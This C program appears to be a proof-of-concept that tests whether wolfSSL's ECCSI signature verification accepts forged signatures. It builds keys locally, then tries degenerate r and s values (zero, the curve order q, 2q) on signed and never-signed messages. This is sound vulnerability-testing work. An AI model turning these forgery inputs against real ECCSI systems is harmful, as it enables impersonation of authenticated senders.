#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wolfssl/options.h>
#include <wolfssl/wolfcrypt/eccsi.h>
#include <wolfssl/wolfcrypt/hash.h>
#include <wolfssl/wolfcrypt/random.h>

#define CURVE_SIZE 32
#define SIG_SIZE (CURVE_SIZE * 4 + 1) /* 129 for P-256 */

static void print_hex(const char* label, const byte* data, word32 len)
{
    printf("%s", label);
    for (word32 i = 0; i < len; i++) {
        printf("%02x", data[i]);
    }
    printf("\n");
}

static void set_scalar(byte* sig, word32 offset, word32 sz, const byte* val, word32 val_len)
{
    memset(sig + offset, 0, sz);
    if (val_len > 0 && val != NULL) {
        /* Copy right-aligned (big-endian) */
        if (val_len <= sz) {
            memcpy(sig + offset + sz - val_len, val, val_len);
        } else {
            memcpy(sig + offset, val + val_len - sz, sz);
        }
    }
}

int main(int argc, char* argv[])
{
    int ret;
    int overall_verdict = 1; /* confirmed = 0 if any forgery passes */
    EccsiKey kms_key, pub_key;
    WC_RNG rng;
    mp_int ssk;
    ecc_point* pvt = NULL;
    byte id[] = "test@wolfssl.com";
    word32 idSz = (word32)strlen((char*)id);
    byte msg[] = "FORGED: any text the attacker wants the victim to authenticate";
    word32 msgSz = (word32)sizeof(msg) - 1;
    byte sig[SIG_SIZE];
    word32 sigSz = sizeof(sig);
    byte hash[WC_MAX_DIGEST_SIZE];
    byte hashSz;
    int verified;
    byte q_bytes[CURVE_SIZE];
    word32 q_len = 0;

    printf("=== ECCSI Universal Signature Forgery Test ===\n");
    printf("Message: %s\n", msg);
    printf("Identity: %s\n", id);
    printf("\n");

    ret = wc_InitRng(&rng);
    if (ret != 0) {
        printf("wc_InitRng failed: %d\n", ret);
        return 1;
    }

    ret = wc_InitEccsiKey_ex(&kms_key, CURVE_SIZE, ECC_SECP256R1, NULL, INVALID_DEVID);
    if (ret != 0) {
        printf("wc_InitEccsiKey_ex failed: %d\n", ret);
        return 1;
    }

    ret = wc_MakeEccsiKey(&kms_key, &rng);
    if (ret != 0) {
        printf("wc_MakeEccsiKey failed: %d\n", ret);
        return 1;
    }

    ret = mp_init(&ssk);
    if (ret != 0) {
        printf("mp_init failed: %d\n", ret);
        return 1;
    }

    pvt = wc_ecc_new_point_h(NULL);
    if (pvt == NULL) {
        printf("wc_ecc_new_point_h failed\n");
        return 1;
    }

    ret = wc_MakeEccsiPair(&kms_key, &rng, WC_HASH_TYPE_SHA256, id, idSz, &ssk, pvt);
    if (ret != 0) {
        printf("wc_MakeEccsiPair failed: %d\n", ret);
        return 1;
    }

    ret = wc_HashEccsiId(&kms_key, WC_HASH_TYPE_SHA256, id, idSz, pvt, hash, &hashSz);
    if (ret != 0) {
        printf("wc_HashEccsiId failed: %d\n", ret);
        return 1;
    }

    ret = wc_SetEccsiHash(&kms_key, hash, hashSz);
    if (ret != 0) {
        printf("wc_SetEccsiHash failed: %d\n", ret);
        return 1;
    }

    ret = wc_SetEccsiPair(&kms_key, &ssk, pvt);
    if (ret != 0) {
        printf("wc_SetEccsiPair failed: %d\n", ret);
        return 1;
    }

    /* Sign a real message to get a valid signature structure */
    ret = wc_SignEccsiHash(&kms_key, &rng, WC_HASH_TYPE_SHA256, msg, msgSz, sig, &sigSz);
    if (ret != 0) {
        printf("wc_SignEccsiHash failed: %d\n", ret);
        return 1;
    }
    printf("Real signature generated, size=%u\n", sigSz);
    print_hex("Real sig r: ", sig, CURVE_SIZE);
    print_hex("Real sig s: ", sig + CURVE_SIZE, CURVE_SIZE);
    printf("\n");

    /* Get the curve order q from the key params */
    ret = mp_to_unsigned_bin_len(&kms_key.params.order, q_bytes, CURVE_SIZE);
    if (ret != 0) {
        printf("mp_to_unsigned_bin_len failed: %d\n", ret);
        return 1;
    }
    print_hex("Curve order q: ", q_bytes, CURVE_SIZE);
    printf("\n");

    /* Prepare public key for verification */
    ret = wc_InitEccsiKey_ex(&pub_key, CURVE_SIZE, ECC_SECP256R1, NULL, INVALID_DEVID);
    if (ret != 0) {
        printf("wc_InitEccsiKey_ex (pub) failed: %d\n", ret);
        return 1;
    }

    /* Export and import public key */
    byte pubData[CURVE_SIZE * 2 + 1];
    word32 pubSz = sizeof(pubData);
    ret = wc_ExportEccsiPublicKey(&kms_key, pubData, &pubSz, 1);
    if (ret != 0) {
        printf("wc_ExportEccsiPublicKey failed: %d\n", ret);
        return 1;
    }
    ret = wc_ImportEccsiPublicKey(&pub_key, pubData, pubSz, 1);
    if (ret != 0) {
        printf("wc_ImportEccsiPublicKey failed: %d\n", ret);
        return 1;
    }

    ret = wc_SetEccsiHash(&pub_key, hash, hashSz);
    if (ret != 0) {
        printf("wc_SetEccsiHash (pub) failed: %d\n", ret);
        return 1;
    }

    /* Test cases for forged signatures */
    struct {
        const char* name;
        byte r_val[CURVE_SIZE];
        byte s_val[CURVE_SIZE];
        int is_zero_r;
        int is_zero_s;
        int is_order_r;
        int is_order_s;
    } tests[] = {
        {"r=0, s=0", {0}, {0}, 1, 1, 0, 0},
        {"r=q, s=q", {0}, {0}, 0, 0, 1, 1},
        {"r=q, s=0", {0}, {0}, 0, 1, 1, 0},
        {"r=q, s=1", {0}, {0}, 0, 0, 1, 0},
        {"r=2q, s=2q", {0}, {0}, 0, 0, 0, 0},
    };
    int num_tests = sizeof(tests) / sizeof(tests[0]);

    /* Fill in the actual order values */
    for (int i = 0; i < num_tests; i++) {
        if (tests[i].is_order_r) {
            memcpy(tests[i].r_val, q_bytes, CURVE_SIZE);
        }
        if (tests[i].is_order_s) {
            memcpy(tests[i].s_val, q_bytes, CURVE_SIZE);
        }
        if (strcmp(tests[i].name, "r=2q, s=2q") == 0) {
            /* For r=2q, we need to double the order value (with carry) */
            int carry = 0;
            for (int j = CURVE_SIZE - 1; j >= 0; j--) {
                int sum = q_bytes[j] * 2 + carry;
                tests[i].r_val[j] = (byte)(sum & 0xFF);
                carry = sum >> 8;
            }
            memcpy(tests[i].s_val, tests[i].r_val, CURVE_SIZE);
        }
        if (strcmp(tests[i].name, "r=q, s=1") == 0) {
            memset(tests[i].s_val, 0, CURVE_SIZE);
            tests[i].s_val[CURVE_SIZE - 1] = 1;
        }
    }

    printf("--- Testing forged signatures ---\n");
    for (int i = 0; i < num_tests; i++) {
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);

        /* Replace r and s, keep PVT from real signature */
        set_scalar(forged, 0, CURVE_SIZE, tests[i].r_val, CURVE_SIZE);
        set_scalar(forged, CURVE_SIZE, CURVE_SIZE, tests[i].s_val, CURVE_SIZE);

        printf("\nTest: %s\n", tests[i].name);
        print_hex("  Forged r: ", forged, CURVE_SIZE);
        print_hex("  Forged s: ", forged + CURVE_SIZE, CURVE_SIZE);

        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg, msgSz,
                                 forged, SIG_SIZE, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);

        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED ***\n");
            overall_verdict = 0;
        } else {
            printf("  Forgery rejected (expected)\n");
        }
    }

    /* Also try r=0, s=0 with a different message */
    byte msg2[] = "Completely different message that was never signed";
    word32 msg2Sz = (word32)sizeof(msg2) - 1;
    {
        byte forged[SIG_SIZE];
        memcpy(forged, sig, SIG_SIZE);
        memset(forged, 0, CURVE_SIZE * 2); /* r=0, s=0 */

        printf("\nTest: r=0, s=0 with DIFFERENT message\n");
        print_hex("  Forged r: ", forged, CURVE_SIZE);
        print_hex("  Forged s: ", forged + CURVE_SIZE, CURVE_SIZE);

        verified = 0;
        ret = wc_VerifyEccsiHash(&pub_key, WC_HASH_TYPE_SHA256, msg2, msg2Sz,
                                 forged, SIG_SIZE, &verified);
        printf("  wc_VerifyEccsiHash ret=%d, verified=%d\n", ret, verified);

        if (ret == 0 && verified) {
            printf("  *** FORGERY ACCEPTED ***\n");
            overall_verdict = 0;
        } else {
            printf("  Forgery rejected (expected)\n");
        }
    }

    /* Cleanup */
    wc_ecc_del_point_h(pvt, NULL);
    mp_clear(&ssk);
    wc_FreeEccsiKey(&kms_key);
    wc_FreeEccsiKey(&pub_key);
    wc_FreeRng(&rng);

    printf("\n=== Overall verdict: %s ===\n",
           overall_verdict == 0 ? "CONFIRMED (forgery accepted)" : "NOT CONFIRMED");

    return overall_verdict;
}
